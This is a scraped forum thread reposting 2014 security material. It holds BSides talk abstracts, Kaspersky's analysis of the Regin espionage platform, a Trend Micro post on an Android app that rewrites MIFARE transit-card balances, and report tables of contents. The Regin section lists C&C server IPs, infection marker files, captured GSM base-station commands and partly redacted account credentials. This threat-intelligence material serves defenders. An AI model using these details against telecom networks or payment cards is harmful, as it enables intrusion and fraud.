  16. [h=1]Michael Legary - NFC & RFID Harvesting for REDACTED[/h] n-PUPDQ0H&index=8Publicat pe 24 nov. 2014 This talk was recorded at BSides Winnipeg 2013. More information can be found at BSides Winnipeg 2013. Mike will discuss areas of experimentation and research for NFC and RFID harvesting including the best ways to make your own long range antennas for NFC reading, and the most interesting hardware builds that you can create to harvest data for close or wide range target applications. Physical hardware examples will be made available throughout the day for experimentation. Michael is an entrepreneur in the security industry who focuses on innovative approaches to building things that secure large enterprise. As a security practitioner, Michael spends his time on researching topics that impact security architecture, risk assessment and forensic procedure, working with folks across the globe to try making things better one day at a time.
  17. [h=1]Mark Jenkins - Auditable Offline Bitcoin Wallet Implementation[/h] n-PUPDQ0H&index=11Publicat pe 24 nov. 2014 This talk was recorded at BSides Winnipeg 2013. More information can be found at BSides Winnipeg 2013. Motivations for operating an offline bitcoin wallet will be explained and security risks associated with obtaining and relying on such software will be examined. The practicality of performing software audits will be discussed, with the size of Armory's code as an example. A small, offline bitcoin wallet implementation will be demonstrated and auditability examined. The presentation will conclude with the potential useful role for self-programmable retro computers under more paranoid circumstances.
  18. [h=1]Richard Rodd & Chris Otto - USB: A Look Inside[/h] Publicat pe 24 nov. 2014 This talk was recorded at BSides Winnipeg 2013. More information can be found at BSides Winnipeg 2013. This talk will be an introduction to the USB protocol at the packet level, leading into an overview of a hardware device that sniffs the USB data of a connection by sitting on the wire between the two endpoints - host and device. Also covered will be the analysis of a USB device through PCAP analysis. Richard has his P. Eng., and is an instructor at the University of Manitoba's School of Medical Rehabilitation. While his courses and research are primarily in the field of assistive technology, information security and reverse engineering have been of interest to him since his early days of programming on the TRS-80, Commodore VIC-20, and Apple IIe. Chris is a senior developer at Novra Technologies in Winnipeg. He has over 15 years of experience, both personal and professional, designing and developing various systems and products ranging from embedded controllers and interfaces, mobile Android application development, to developing parts of DB2.
  19. Link: https://nsa.gov1.info/dni/nsa-ant-catalog/index.html
  20. L-am descarcat si ma uit peste el. Pare scris cu picioarele. Un jeg. Dar il testam si daca pare ok il lasam.
  21. Regin: Nation-state ownage of GSM networks "Beware of Regin, the master! His heart is poisoned. He would be thy bane..." By GReAT on November 24, 2014. 2:00 pm Incidents Research GReAT Kaspersky Labs' Global Research & Analysis Team @e_kaspersky/great Motto: "Beware of Regin, the master! His heart is poisoned. He would be thy bane..." "The Story of Siegfried" by James Baldwin Introduction, history Download our full Regin paper (PDF). In the spring of 2012, following a Kaspersky Lab presentation on the unusual facts surrounding the Duqu malware, a security researcher contacted us and mentioned that Duqu reminded him of another high-end malware incident. Although he couldn't share a sample, the third-party researcher mentioned the "Regin" name, a malware attack that is now dreaded by many security administrators in governmental agencies around the world. For the past two years, we've been tracking this most elusive malware across the world. From time to time, samples would appear on various multi-scanner services, but they were all unrelated to each other, cryptic in functionality and lacking context. It's unknown exactly when the first samples of Regin were created. Some of them have timestamps dating back to 2003. The victims of Regin fall into the following categories: Telecom operators Government institutions Multi-national political bodies Financial institutions Research institutions Individuals involved in advanced mathematical/cryptographical research So far, we've observed two main objectives from the attackers: Intelligence gathering Facilitating other types of attacks While in most cases, the attackers were focused on extracting sensitive information, such as e-mails and documents, we have observed cases where the attackers compromised telecom operators to enable the launch of additional sophisticated attacks. More about this in the GSM Targeting section below. Perhaps one of the most publicly known victims of Regin is Jean Jacques Quisquater (https://en.wikipedia.org/wiki/Jean-Jacques_Quisquater), a well-known Belgian cryptographer. In February 2014, Quisquater announced he was the victim of a sophisticated cyber intrusion incident. We were able to obtain samples from the Quisquater case and confirm they belong to the Regin platform. Another interesting victim of Regin is a computer we are calling "The Magnet of Threats". This computer belongs to a research institution and has been attacked by Turla, Mask/Careto, Regin, Itaduke, Animal Farm and some other advanced threats that do not have a public name, all co-existing happily on the same computer at some point. Initial compromise and lateral movement The exact method of the initial compromise remains a mystery, although several theories exist, which include man-in-the-middle attacks with browser zero-day exploits. For some of the victims, we observed tools and modules designed for lateral movement. So far, we have not encountered any exploits. The replication modules are copied to remote computers by using Windows administrative shares and then executed. Obviously, this technique requires administrative privileges inside the victim's network. In several cases, the infected machines were also Windows domain controllers. Targeting of system administrators via web-based exploits is one simple way of achieving immediate administrative access to the entire network. The Regin platform In short, Regin is a cyber-attack platform which the attackers deploy in the victim networks for ultimate remote control at all possible levels. The platform is extremely modular in nature and has multiple stages. Regin platform diagram The first stage ("stage 1") is generally the only executable file that will appear in victim' systems. Further stages are stored either directly on the hard drive (for 64 bit systems), as NTFS Extended Attributes or registry entries. We've observed many different stage 1 modules, which sometimes have been merged with public sources to achieve a type of polymorphism, complicating the detection process. The second stage has multiple purposes and can remove the Regin infection from the system if instructed so by the 3rd stage. The second stage also creates a marker file that can be used to identify the infected machine. Known filenames for this marker are: %SYSTEMROOT%\system32\nsreg1.dat %SYSTEMROOT%\system32\bssec3.dat %SYSTEMROOT%\system32\msrdc64.dat Stage 3 exists only on 32 bit systems - on 64 bit systems, stage 2 loads the dispatcher directly, skipping the third stage. Stage 4, the dispatcher, is perhaps the most complex single module of the entire platform. The dispatcher is the user-mode core of the framework. It is loaded directly as the third stage of the 64-bit bootstrap process or extracted and loaded from the VFS as module 50221 as the fourth stage on 32-bit systems. The dispatcher takes care of the most complicated tasks of the Regin platform, such as providing an API to access virtual file systems, basic communications and storage functions as well as network transport sub-routines. In essence, the dispatcher is the brain that runs the entire platform. A thorough description of all malware stages can be found in our full technical paper. Virtual File Systems (32/64-bit) The most interesting code from the Regin platform is stored in encrypted file storages, known as Virtual File Systems (VFSes). During our analysis we were able to obtain 24 VFSes, from multiple victims around the world. Generally, these have random names and can be located in several places in the infected system. For a full list, including format of the Regin VFSes, see our technical paper. Unusual modules and artifacts With high-end APT groups such as the one behind Regin, mistakes are very rare. Nevertheless, they do happen. Some of the VFSes we analyzed contain words which appear to be the respective codenames of the modules deployed on the victim: legspinv2.6 and LEGSPINv2.6 WILLISCHECKv2.0 HOPSCOTCH Another module we found, which is a plugin type 55001.0 references another codename, which is U_STARBUCKS: GSM Targeting The most interesting aspect we found so far about Regin is related to an infection of a large GSM operator. One VFS encrypted entry we located had internal id 50049.2 and appears to be an activity log on a GSM Base Station Controller. From https://en.wikipedia.org/wiki/Base_station_subsystem According to the GSM documentation (http://www.telecomabc.com/b/bsc.html): "The Base Station Controller (BSC) is in control of and supervises a number of Base Transceiver Stations (BTS). The BSC is responsible for the allocation of radio resources to a mobile call and for the handovers that are made between base stations under his control. Other handovers are under control of the MSC." Here's a look at the decoded Regin GSM activity log: This log is about 70KB in size and contains hundreds of entries like the ones above. It also includes timestamps which indicate exactly when the command was executed. The entries in the log appear to contain Ericsson OSS MML (Man-Machine Language as defined by ITU-T) commands. Here's a list of some commands issued on the Base Station Controller, together with some of their timestamps: 2008-04-25 11:12:14: rxmop:moty=rxotrx; 2008-04-25 11:58:16: rxmsp:moty=rxotrx; 2008-04-25 14:37:05: rlcrp:cell=all; 2008-04-26 04:48:54: rxble:mo=rxocf-170,subord; 2008-04-26 06:16:22: rxtcp:MOty=RXOtg,cell=kst022a; 2008-04-26 10:06:03: IOSTP; 2008-04-27 03:31:57: rlstc:cell=pty013c,state=active; 2008-04-27 06:07:43: allip:acl=a2; 2008-04-28 06:27:55: dtstp:DIP=264rbl2; 2008-05-02 01:46:02: rlstp:cell=all,state=halted; 2008-05-08 06:12:48: rlmfc:cell=NGR035W,mbcchno=83&512&93&90&514&522,listtype=active; 2008-05-08 07:33:12: rlnri:cell=NGR058y,cellr=ngr058x; 2008-05-12 17:28:29: rrtpp:trapool=all; [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 10 11 12 13 [/TD] [TD=class: crayon-code]2008-04-25 11:12:14: rxmop:moty=rxotrx; 2008-04-25 11:58:16: rxmsp:moty=rxotrx; 2008-04-25 14:37:05: rlcrp:cell=all; 2008-04-26 04:48:54: rxble:mo=rxocf-170,subord; 2008-04-26 06:16:22: rxtcp:MOty=RXOtg,cell=kst022a; 2008-04-26 10:06:03: IOSTP; 2008-04-27 03:31:57: rlstc:cell=pty013c,state=active; 2008-04-27 06:07:43: allip:acl=a2; 2008-04-28 06:27:55: dtstp:DIP=264rbl2; 2008-05-02 01:46:02: rlstp:cell=all,state=halted; 2008-05-08 06:12:48: rlmfc:cell=NGR035W,mbcchno=83&512&93&90&514&522,listtype=active; 2008-05-08 07:33:12: rlnri:cell=NGR058y,cellr=ngr058x; 2008-05-12 17:28:29: rrtpp:trapool=all;[/TD] [/TR] [/TABLE] Descriptions for the commands: rxmop - check software version type; rxmsp - list current call forwarding settings of the Mobile Station; rlcrp - list off call forwarding settings for the Base Station Controller; rxble - enable (unblock) call forwarding; rxtcp - show the Transceiver Group of particular cell; allip - show external alarm; dtstp - show DIgital Path (DIP) settings (DIP is the name of the function used for supervision of the connected PCM (Pulse Code Modulation) lines); rlstc - activate cell(s) in the GSM network; rlstp - stop cell(s) in the GSM network; rlmfc - add frequencies to the active broadcast control channel allocation list; rlnri - add cell neightbour; rrtpp - show radio transmission transcoder pool details; The log seems to contain not only the executed commands but also usernames and passwords of some engineering accounts: sed[snip]:Alla[snip] hed[snip]:Bag[snip] oss:New[snip] administrator:Adm[snip] nss1:Eric[snip] In total, the log indicates that commands were executed on 136 different cells. Some of the cell names include "prn021a, gzn010a, wdk004, kbl027a, etc...". The command log we obtained covers a period of about one month, from April 25, 2008 through May 27, 2008. It is unknown why the commands stopped in May 2008 though; perhaps the infection was removed or the attackers achieved their objective and moved on. Another explanation is that the attackers improved or changed the malware to stop saving logs locally and that's why only some older logs were discovered. Communication and C&C The C&C mechanism implemented in Regin is extremely sophisticated and relies on communication drones deployed by the attackers throughout the victim networks. Most victims communicate with another machine in their own internal network, through various protocols, as specified in the config file. These include HTTP and Windows network pipes. The purpose of such a complex infrastructure is to achieve two goals: give attackers access deep into the network, potentially bypassing air gaps and restrict as much as possible the traffic to the C&C. Here's a look at the decoded configurations: 17.3.40.101 transport 50037 0 0 y.y.y.5:80 ; transport 50051 217.y.y.yt:443 17.3.40.93 transport 50035 217.x.x.x:443 ; transport 50035 217.x.x.x:443 50.103.14.80 transport 27 203.199.89.80 ; transport 50035 194.z.z.z:8080 51.9.1.3 transport 50035 192.168.3.3:445 ; transport 50035 192.168.3.3:9322 18.159.0.1 transport 50271 DC ; transport 50271 DC [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 [/TD] [TD=class: crayon-code]17.3.40.101 transport 50037 0 0 y.y.y.5:80 ; transport 50051 217.y.y.yt:443 17.3.40.93 transport 50035 217.x.x.x:443 ; transport 50035 217.x.x.x:443 50.103.14.80 transport 27 203.199.89.80 ; transport 50035 194.z.z.z:8080 51.9.1.3 transport 50035 192.168.3.3:445 ; transport 50035 192.168.3.3:9322 18.159.0.1 transport 50271 DC ; transport 50271 DC[/TD] [/TR] [/TABLE] In the above table, we see configurations extracted from several victims that bridge together infected machines in what appears to be virtual networks: 17.3.40.x, 50.103.14.x, 51.9.1.x, 18.159.0.x. One of these routes reaches out to the "external" C&C server at 203.199.89.80. The numbers right after the "transport" indicate the plugin that handles the communication. These are in our case: 27 - ICMP network listener using raw sockets 50035 - Winsock-based network transport 50037 - Network transport over HTTP 50051 - Network transport over HTTPS 50271 - Network transport over SMB (named pipes) The machines located on the border of the network act as routers, effectively connecting victims from inside the network with C&Cs on the internet. After decoding all the configurations we've collected, we were able to identify the following external C&Cs. [TABLE=width: 80%] [TR] [TD=width: 30%, align: center]C&C server IP[/TD] [TD=width: 35%, align: center]Location[/TD] [TD=width: 35%, align: center]Description[/TD] [/TR] [TR] [TD]61.67.114.73[/TD] [TD]Taiwan, Province Of China Taichung[/TD] [TD]Chwbn[/TD] [/TR] [TR] [TD]202.71.144.113[/TD] [TD]India, Chetput[/TD] [TD]Chennai Network Operations (team-m.co)[/TD] [/TR] [TR] [TD]203.199.89.80[/TD] [TD]India, Thane[/TD] [TD]Internet Service Provider[/TD] [/TR] [TR] [TD]194.183.237.145[/TD] [TD]Belgium, Brussels[/TD] [TD]Perceval S.a.[/TD] [/TR] [/TABLE] One particular case includes a country in the Middle East. This case was mind-blowing so we thought it's important to present it. In this specific country, all the victims we identified communicate with each other, forming a peer-to-peer network. The P2P network includes the president's office, a research center, educational institution network and a bank. These victims spread across the country are all interconnected to each other. One of the victims contains a translation drone which has the ability to forward the packets outside of the country, to the C&C in India. This represents a rather interesting command-and-control mechanism, which is guaranteed to raise very little suspicions. For instance, if all commands to the president's office are sent through the bank's network, then all the malicious traffic visible for the president's office sysadmins will be only with the bank, in the same country. Victim Statistics Over the past two years, we collected statistics about the attacks and victims of Regin. These were aided by the fact that even after the malware is uninstalled, certain artifacts are left behind which can help identify an infected (but cleaned) system. For instance, we've seen several cases where the systems were cleaned but the "msrdc64.dat" infection marker was left behind. So far, victims of Regin were identified in 14 countries: Algeria Afghanistan Belgium Brazil Fiji Germany Iran India Indonesia Kiribati Malaysia Pakistan Russia Syria In total, we counted 27 different victims, although it should be pointed out that the definition of a victim here refers to a full entity, including their entire network. The number of unique PCs infected with Regin is of course much, much higher. From the map above, Fiji and Kiribati are unusual, because we rarely see such advanced malware in such remote, small countries. In particular, the victim in Kiribati is most unusual. To put this into context, Kiribati is a small island in the Pacific, with a population around 100,000. More information about the Regin victims is available through Kaspersky Intelligent Services. Contact: intelreports@kaspersky.com Attribution Considering the complexity and cost of Regin development, it is likely that this operation is supported by a nation-state. While attribution remains a very difficult problem when it comes to professional attackers such as those behind Regin, certain metadata extracted from the samples might still be relevant. As this information could be easily altered by the developers, it's up to the reader to attempt to interpret this: as an intentional false flag or a non-critical indicator left by the developers. More information about Regin is available to Kaspersky Intelligent Services' clients. Contact: intelreports@kaspersky.com Conclusions For more than a decade, a sophisticated group known as Regin has targeted high-profile entities around the world with an advanced malware platform. As far as we can tell, the operation is still active, although the malware may have been upgraded to more sophisticated versions. The most recent sample we've seen was from a 64-bit infection. This infection was still active in the spring of 2014. The name Regin is apparently a reversed "In Reg", short for "In Registry", as the malware can store its modules in the registry. This name and detections first appeared in anti-malware products around March 2011. From some points of view, the platform reminds us of another sophisticated malware: Turla. Some similarities include the use of virtual file systems and the deployment of communication drones to bridge networks together. Yet through their implementation, coding methods, plugins, hiding techniques and flexibility, Regin surpasses Turla as one of the most sophisticated attack platforms we have ever analysed. The ability of this group to penetrate and monitor GSM networks is perhaps the most unusual and interesting aspect of these operations. In today's world, we have become too dependent on mobile phone networks which rely on ancient communication protocols with little or no security available for the end user. Although all GSM networks have mechanisms embedded which allow entities such as law enforcement to track suspects, there are other parties which can gain this ability and further abuse them to launch other types of attacks against mobile users. Full technical paper with IOCs. Kaspersky products detect modules from the Regin platform as: Trojan.Win32.Regin.gen and Rootkit.Win32.Regin. If you detect a Regin infection in your network, contact us at: intelservices@kaspersky.com Sursa: Regin: Nation-state ownage of GSM networks - Securelist
  22. Understanding Crypto-Ransomware Table of Contents Executive Summary 3 Introduction 4 Dataset and Timeline 6 Analysis Methodology 8 Results 11 Droppers, anti-analysis and persistence 11 C&C communication 13 Encryption 15 Targeted file types 17 Payment options 20 Implementation, flaws and version evolution 22 Conclusion 24 References 26 Appendix A: Fake Cryptolocker C&C Server 28 and CryptDecrypt Hook Appendix B: Fake Cryptowall C&C Server 30 Appendix C: Hooking WriteProcessMemory 32 About Bromium 35 Download: http://www.bromium.com/sites/default/files/bromium-report-ransomware.pdf
  23. Hacking RFID Payment Cards Made Possible with Android App 2:03 am (UTC-7) | by Veo Zhang (Mobile Threats Analyst) We recently encountered a high-risk Android app detected as ANDROIDOS_STIP.A in Chile. This app, found distributed through forums and blogs, can be used to hack into the user’s RFID bus transit card to recharge the credits. What is the mechanism behind this, and what is the security risk of RFID payment cards in general? Paying via RFID cards is becoming more popular nowadays as more mobile devices add NFC support. Banks, merchants or public services issue RFID cards to their customers with prepaid credits. Security Issues with RFID Cards Because it is widely used, it’s no surprise that that RFID cards have become targeted by attacks. Take for instance the recent Tarjeta bip! card hacking incident in Chile. These cards are MIFARE-based smartcards; MIFARE refers to a family of chips widely used in contactless smart cards and proximity cards. Figure 1. MIFARE devices Looking at the code of the Android app, we found that if it runs on a device equipped with NFC it can read and write to these cards. The malicious app writes predefined data onto the card, raising the user’s balance to 10,000 Chilean pesos (approximately 15 US dollars). This particular trick will only work with this particular fare card, since it relies on the format of the card in question. How was the tool’s author able to rewrite the card’s information despite not having the correct authentication keys? This is because these cards are based on an older version of the MIFARE series of cards (MIFARE Classic), which is known to have multiple security problems. An attacker is able to clone or modify a MIFARE Classic card in under 10 seconds, and the equipment (such as the Proxmark3), together with any needed support, is sold online. Figure 2. Proxmark3 for sale Using widely available tools, the attacker cracked the card’s authentication key. With the cracked key and the native NFC support in Android and the device, cloning a card and adding credits can be easily implemented in a mobile app. Figure 3. Manufacturer and memory content of a MIFARE Classic card Attacks on other kinds of MIFARE cards (specifically, MIFARE DESFire and MIFARE Ultralight) are known to exist. We know of at least three vulnerable cards which we have: a social security card with banking service, a payment card for transportation and shopping, and a dining card. The social security card has approximately seven million users. Figure 4. MIFARE DESFire-based social security card The dining card uses MIFARE Classic cards, and our testing revealed the on-card credits can be manipulated. The two other cards are MIFARE DESFire cards, which are vulnerable to side-channel attacks. The cryptosystems in these cards leak information if the power used is monitored; the keys can be recovered within seven hours. If the issued keys are not random, customer cards can be cloned or manipulated similarly to MIFARE Classic cards. Or even worse, credits can also be manipulated within a NFC-enabled mobile device. Conclusion These particular MIFARE models were discontinued years ago and supplemented with more secure models. However, it appears that card issuers have opted for cheaper solutions which put their customers at risk. NFC We recommend customers take steps to protect RFID cards in their possession. They should also periodically check the balances of their accounts as well. In addition, if possible, they should check if any cards they are currently using are vulnerable and report these to their providers. RFID/NFC attacks are a well-known risk; in the past we have provided tips both to end users and businesses on how to use NFC safely. Sursa: Hacking RFID Payment Cards Made Possible with Android App | Security Intelligence Blog | Trend Micro
  24. Regin: Top-tier espionage tool enables stealthy surveillance Symantec Security Response Version 1.0 – November 24, 2014 OVERVIEW...................................................................... 3 Introduction................................................................... 5 Timeline.......................................................................... 5 Target profile.................................................................. 6 Infection vector........................................................ 6 Architecture................................................................... 8 Stage 0 (dropper)..................................................... 9 Stage 1...................................................................... 9 Stage 2...................................................................... 9 Stage 3...................................................................... 9 Stage 4............................................................ 11 Stage 5.................................................................... 11 Encrypted virtual file system containers ?????????????? 11 Command-and-control operations......................... 12 Logging................................................................... 12 Payloads....................................................................... 14 64-bit version............................................................... 15 File names.............................................................. 15 Stage differences................................................... 15 Conclusion.................................................................... 16 Protection..................................................................... 16 Appendix...................................................................... 18 Data files................................................................ 18 Indicators of compromise............................................ 20 File MD5s................................................................ 20 File names/paths.................................................... 20 Extended attributes............................................... 21 Registry.................................................................. 21 Download: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/regin-analysis.pdf
×
×
  • Create New...